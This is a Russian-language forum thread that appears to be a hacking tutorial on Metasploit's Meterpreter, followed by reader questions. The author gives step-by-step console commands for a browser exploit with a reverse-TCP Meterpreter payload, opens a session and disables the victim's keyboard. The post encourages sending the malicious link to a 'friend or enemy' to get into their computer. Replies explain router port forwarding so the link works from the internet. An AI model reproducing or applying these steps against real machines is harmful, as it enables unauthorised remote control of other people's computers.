![]() |
Учимся юзать Мeterpreter (Или Metasploit Framework часть 4)
Учимся юзать Мeterpreter (Или Metasploit Framework часть 4) Предисловие. Если в первый раз слышите слова Мeterpreter, Metasploit Framework - то рекомендую почитать мои предыдущие статьи по Метасплоиту (ссылки на них можно найти у меня в подписи). Если их читали то можете читать дальше. Всё описанное в статье справедливо для версии 3.0 beta 3 1. Что такое Мeterpreter? В Предыдущих статьях (№3) частично этот вопрос поднимался и было дано определение данного понятия, но всё же я повторюсь и скажу своими словами: Мeterpreter - это особый полезный груз (начинка эксплоита) которая может выполнять не какую-либо конкретную задачу, а много функций. Даже если сравнивать его с каким-либо шелл`ом, мы увидим что он есть только для виндос и очень похож на обычный cmd-шелл.Ну да ладно, перейдём от теории к практике, запустим консоль, посмотрим что мы имеем (команда show). Код:
msf > show2. Выбираем сплоит. Я буду показывать на примере эксплоита windows/browser/webview_setslice (буду использовать его). 3. Выбираем начинку (собственно meterpreter - ему и посвящена статья) Как мы видим meterpreter есть только для виндос (по типу соединения 5 шт.)Ну, ИМХО, по названию понятно, какой что делает, но всё же, для тех кто в танке, поясню: Код:
Windows Meterpreter, Bind TCP Stager - тупо биндит порт Stager (Stage - стадия, ну в русском нет перевода, назову стэйжер) Код:
msf > use windows/browser/webview_setsliceПараметры меня устаривают - оставлю их по умолчанию. (URIPATH - красавец, но пусть будет случайный) 4.Эксплуатируем. Прикручиваем начинку - наш загадочный windows/meterpreter/reverse_tcpКод:
msf exploit(webview_setslice) > set PAYLOAD windows/meterpreter/reverse_tcpКод:
msf exploit(webview_setslice) > exploitКод:
msf exploit(webview_setslice) > set LHOST 10.0.3.44Заходим в нашу гостевую ОС WIN-XP-SP2 (ну а вы можете впаривать ссылку, предварительно её закодировав, если надо, другу/врагу, в надежде пролезть в его комп), запускаем многострадальный IE и заходим по ссылке. Через некоторое время (имхо, сплоит на переполнение) наблюдаем в консоли это: Код:
msf exploit(webview_setslice) > [*] Transmitting intermediate stager for over-sized stage...(89 bytes)Передача промежуточного звена стэйжера для стадии с завышенными размерами (короче сами переведёте)...(89 bytes) Отправка стэйжера (2834 bytes) Бездействие перед обработкой стадии Заливка DLL (73739 bytes)... Заливка закончена. Meterpreter сессия 1 открыта (понятно между кем и чем) Ну это всё детали... главное результат! К нам подсоединился наш клиент-жертва, жмём enter в консоли, набираем sessions -i 1 Код:
msf exploit(webview_setslice) > sessions -i 1Код:
meterpreter > help5. Внутри Мeterpreter(лазаем по чужому компу)! Ну описывать сейчас каждую я не буду, имхо для знающих людей хелпа на английском достаточно. Попробуем что-нибудь из этих команд, посмотрим например версию ОС:Код:
meterpreter > sysinfoКод:
meterpreter > ipconfigВыключим у юзверя например мышку ;-) Код:
meterpreter > uictlКод:
meterpreter > uictl disable keyboardКод:
irb Drop into irb scripting mode ------------ уйти в IRB-скрипт режим (Понравится знающим язык Руби) Заключение. Ну вот и всё, не так оказался страшен зверь как его именуют, вполне рабочий, многофункциональный шелл для винды, открывающий практически безграничную власть над компом юзверя.Удачи всем в использовании meterpreter! |
Цитата:
Улыбнуло. За труды благодарность. |
Код:
[*] Starting interaction with 1...Ждём... Ждём... И ничего не происходит =) В чём проблема? |
Прошу прощения если мой вопрос покажется Вам глупым, но всетаки... У меня ADSL модем, мой локальный ip имеет обычный вид 192.168.1.33
Если при создании explot изменить LHOST на мой внешний ip 84.186.хх.ххх то сервер не стартует. Собственно сам вопрос: Как и, что нужно менять в настройках при создании exploit чтобы впариваемая ссылка имела вид [*] Using URL: http:// 84.186.хх.ххх:8080 вместо [*] Using URL: http:// 192.168.1.33 :8080. Надеюсь Вам понятен смысл моего вопроса. И за ранее прошу прощения если я тут спросил бональную чушь. |
Есть LHOST у сплоита, а есть RHOST У начинки (например реверсшелл-начинка должна знать куда коннектится)
1. Сплоит всегда висит у тебя на локалхосте, т.е. на http:// 192.168.1.33:8080. - это правильно. 2. В конфигураторе модема ты должен настроить редирект с внешниго IP на внутренний., т.е. переадресовывать пакеты по всем портам приходящие из вне на 84.186.хх.ххх --> 192.168.1.33:8080. Тогда можно будет впарить ссылку содержащюю внешний IP, в этом случае запрос будет переадресован на внутренний IP, т.е. web-серверу метасплоита. ЗЫ Обо всём этом есть в предыдущих статьях (не раз описывалось). |
Цитата:
|
Напиши какой мопед у тебя, ведь я же не знаю, поэтому и ссылку не могу дать.
А в краце всё очень просто: заходишь броузером в web-кофигуратор мопеда (если по-умолчанию, то IP его 192.168.1.1, авторизуешься, т.е. вводишь пасс или имя и пасс, топаешь в NAT и там прописываешь свой внутренний IP в портах указываешь Аll или там есть строка специальная для всех портов, туда вписываешь свой IP компа (внутренний). Всё- редирект настроен... Только в этом случае все сетевые сервисы которые крутятся у тебя на компе 'светят" в Инет и если какие-либо уязвимы, то свой комп ты подвергаешь риску быть похекнутым..Поэтому лучше открыть (редиректить) только определённые порты: в частности для web-сервера Метасплоита 8080, а вот для реверсшелла не угадаешь (по случайным портам коннект происходит). |
| Время: 19:42 |